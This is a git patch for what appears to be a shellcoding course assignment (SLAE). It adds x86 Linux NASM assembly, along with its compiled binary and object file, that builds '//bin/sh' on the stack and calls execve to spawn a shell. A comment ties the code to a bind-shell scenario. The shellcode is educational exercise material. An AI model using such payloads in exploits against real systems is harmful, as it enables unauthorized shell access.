From 3ff2c81673203b72d70160990994abd0db855909 Mon Sep 17 00:00:00 2001
From: arno01 <andrey.arapov@gmail.com>
Date: Thu, 7 Mar 2013 23:19:59 +0100
Subject: [PATCH] SLAE Assignment #1

---
 exam1/execve-stack      | Bin 0 -> 530 bytes
 exam1/execve-stack.nasm |  57 ++++++++++++++++++++++++++++++++++++++++
 exam1/execve-stack.o    | Bin 0 -> 464 bytes
 3 files changed, 57 insertions(+)
 create mode 100755 exam1/execve-stack
 create mode 100644 exam1/execve-stack.nasm
 create mode 100644 exam1/execve-stack.o

diff --git a/exam1/execve-stack b/exam1/execve-stack
new file mode 100755
index 0000000000000000000000000000000000000000..9731f409c35df01d7669142bc93286939d46d6e4
GIT binary patch
literal 530
zcmb<-^>JflWMqH=CI)5(5HF#Dg~J3$uYgLJFem`UH5gbKn85O2VW1iYAZ`J2K$sOI
zC;%c5!0^BZZo^AK8F~7}85#QeNtvCGgMvFB26a9<+W?efG`xMbfkCghGPfi#2}qX|
zLFfz^t0c9e1YsIsmNZZa$o*_U4Dv$)kX8X=7=SrX5GcS569m#A_bVdtL1useh-Lz_
zAVdLBpa95Z0b-DT5DhYu6UqltVDJE_&IrZ<(lGOogy2k&J3$;!$Rn#`Vfgr87$^>t
z7XZpi0r@QxAnFBx@@i;&T{J#JYDH>tS*mVvNn&!gUS48xE<-$!T~xvlAD>iQ3}dIJ
OB$gyH#HZ$^FaQ7yFGbA&

literal 0
HcmV?d00001

diff --git a/exam1/execve-stack.nasm b/exam1/execve-stack.nasm
new file mode 100644
index 0000000..35717d1
--- /dev/null
+++ b/exam1/execve-stack.nasm
@@ -0,0 +1,57 @@
+; Filename: execve-stack.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+
+        ; 
+        ; =============================== EXECVE =====================================
+        ;
+	; Now as we forwarded sockfd to a client, we can spawn shell.
+       	; Prepare the path, in little-endian, using the Python
+        ; >>> '//bin/sh'[::-1].encode('hex')
+        ; '68732f6e69622f2f'
+        ;
+        ; int execve(const char *filename, char *const argv[], char *const envp[]);
+        ; EAX           EBX,                    ECX,            EDX
+        ; 11            '//bin/sh'              PTR to EBX      NULL
+       	;
+        ;
+
+	; EAX
+	xor eax, eax
+        mov al, 11              ; execve syscall
+
+        ; EBX
+        xor edx, edx
+	push edx                ; NULL termination of '//bin/sh' string
+        push 0x68732f6e         ; '//bin/sh' in reverse
+        push 0x69622f2f         ; beginning of '//bin/sh' string is here
+        mov ebx, esp            ; put the address of '//bin/sh' into ebx via esp
+
+	; ECX
+        push edx                ; NULL termination of a stack
+        push ebx                ; load our '//bin/sh' on a stack
+        mov ecx, esp            ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+        ; EDX
+        push edx                ; NULL terminator
+        mov edx, esp            ; EDX is a PTR to a stack which has an address to NULL.
+        int 0x80
+
+	
+	; === EXIT(0) ===
+	; void _exit(int status);
+	; /usr/include/asm/unistd_32.h:#define __NR_exit		  1
+	xor eax, eax	; EAX = 0x000000
+	mov al, 1	; EAX = 0x000001	1: exit syscall
+	xor ebx, ebx	; EBX = 0x000000	0: success status
+	int 0x80
+
+
+;section .data
diff --git a/exam1/execve-stack.o b/exam1/execve-stack.o
new file mode 100644
index 0000000000000000000000000000000000000000..0992e7ab831d6ec00309aba5db23d10409fae11c
GIT binary patch
literal 464
zcmb<-^>JflWMqH=Mh0dE1doBi0V-hvrZpH?8JJ*7Nuoh!f-oCYmjIBXf@FdKl+6yL
znUTaDfa(;H_#iVtKoE$LT~Yv)Z~%(205M2Ehz6M{3FQMRFxUW8Ck5jGX_$F1A;SY3
zxD77_W#s7>XJqK>CuMd%4hrsk7}WXbYy(h^(eU=!2AEnftyhv-QNo~CoKaj-RFaqk
zWL4%uXb2xgF(wDueinw0|B+RIVnP^6Kmg?0)QZ&PvQ*vTlEma}y}ZQYT!wfcyQl=J
F4ggd0E5`r;

literal 0
HcmV?d00001